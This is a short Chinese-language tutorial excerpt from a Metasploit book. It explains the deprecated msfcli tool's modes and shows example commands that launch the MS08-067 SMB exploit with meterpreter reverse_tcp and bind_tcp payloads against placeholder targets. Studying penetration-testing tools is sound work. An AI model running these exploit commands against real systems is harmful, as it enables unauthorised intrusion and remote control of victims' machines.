原文:《metasploit the pentration tester’s guide》
msfcli命令为方便metasploit框架和其他的shell交互而设计. 2015年6月8号 被弃用了
root@xxoo:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================
Mode Description
—- ———–
(A)dvanced Show available advanced options for this module #显示该模块的所有高级配置选项
(AC)tions Show available actions for this auxiliary module #显示辅助模块的所有可用动作
(C)heck Run the check routine of the selected module #运行选定模块的检查例程
(E)xecute Execute the selected module #运行选定的模块
(H)elp You’re looking at it baby! #帮助信息
(I)DS Evasion Show available ids evasion options for this module #显示该模块的可用IDS逃逸选项(O)ptions Show available options for this module #显示所有配置选项
(P)ayloads Show available payloads for this module #显示该模块适用的攻击载荷 (S)ummary Show information about this module #显示关于该模块详细信息
(T)argets Show available targets for this exploit module #显示渗透攻击模块的所有攻击目标类型
查看某一个exploit的options :
root@xxoo:~# msfcli windows/smb/ms08_067_netapi O
设置options 同时显示payloads的命令如下:
root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 P
设置好options,payloads然后执行exploit的命令如下:
root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=www.xx.com PAYLOAD=windows/meterpreter/reverse_tcp LHOST=xxoo E
root@xxoo:~# msfcli | grep exploit
仅列出渗透攻击模块。
root@xxoo:~# msfcli | grep exploit/windows
仅列出与windows相关的渗透攻击模块。
root@xxoo:~# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
对IP发起ms08_067_netapi渗透攻击,配置了bind_tcp攻击载荷,并绑定在PORT端口进行监听。